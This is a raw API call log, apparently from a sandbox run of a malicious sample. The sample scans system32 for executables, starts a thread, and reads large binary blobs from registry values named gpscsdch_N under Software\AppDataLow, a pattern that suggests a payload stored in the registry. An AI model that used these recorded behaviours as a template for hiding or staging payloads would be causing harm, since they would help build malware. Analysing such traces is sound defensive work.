	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.589] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] StrRChrW (lpStart="RmClient.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.590] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.590] FindClose (in: hFindFile=0x503b90 | out: hFindFile=0x503b90) returned 1
	[0088.590] GetTickCount () returned 0x29c36
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.590] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetLastError () returned 0x0
	[0088.591] GetSystemDirectoryW (in: lpBuffer=0x507d80, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.591] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.591] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 0x503b90
	[0088.591] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.591] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.591] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.591] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.607] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.607] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.607] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.607] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.607] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.607] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.608] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] StrRChrW (lpStart="EaseOfAccessDialog.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] StrRChrW (lpStart="EhStorAuthn.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0088.609] FindNextFileW (in: hFindFile=0x503b90, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.609] FindClose (in: hFindFile=0x503b90 | out: hFindFile=0x503b90) returned 1
	[0088.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4077a0, lpParameter=0x4fff20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d8
	[0088.610] CloseHandle (hObject=0x1d8) returned 1
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.610] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afcb4, lpdwDisposition=0x0 | out: phkResult=0x20afcb4*=0x1d8, lpdwDisposition=0x0) returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.611] GetLastError () returned 0x0
	[0088.612] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0088.612] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0088.612] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.621] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x20afc7c, lpData=0x508c20, lpcbData=0x20afc88*=0x7d000 | out: lpType=0x20afc7c*=0x3, lpData=0x508c20*, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.636] RegCloseKey (hKey=0x1d0) returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] GetLastError () returned 0x0
	[0088.639] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_1") returned 10
	[0088.639] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0088.639] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.691] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x20afc7c, lpData=0x508e70, lpcbData=0x20afc88*=0x7d000 | out: lpType=0x20afc7c*=0x3, lpData=0x508e70*, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.706] RegCloseKey (hKey=0x1d0) returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] GetLastError () returned 0x0
	[0088.716] wsprintfW (in: param_1=0x20afcd8, param_2="%s_%d" | out: param_1="gpscsdch_2") returned 10
	[0088.716] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x20afc88, lpdwDisposition=0x0 | out: phkResult=0x20afc88*=0x1d0, lpdwDisposition=0x0) returned 0x0
	[0088.716] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x20afc7c, lpData=0x0, lpcbData=0x20afc88*=0x0 | out: lpType=0x20afc7c*=0x3, lpData=0x0, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.722] RegQueryValueExW (in: hKey=0x1d0, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x20afc7c, lpData=0x2590048, lpcbData=0x20afc88*=0x7d000 | out: lpType=0x20afc7c*=0x3, lpData=0x2590048*, lpcbData=0x20afc88*=0x7d000) returned 0x0
	[0088.780] RegCloseKey (hKey=0x1d0) returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
	[0088.797] GetLastError () returned 0x0
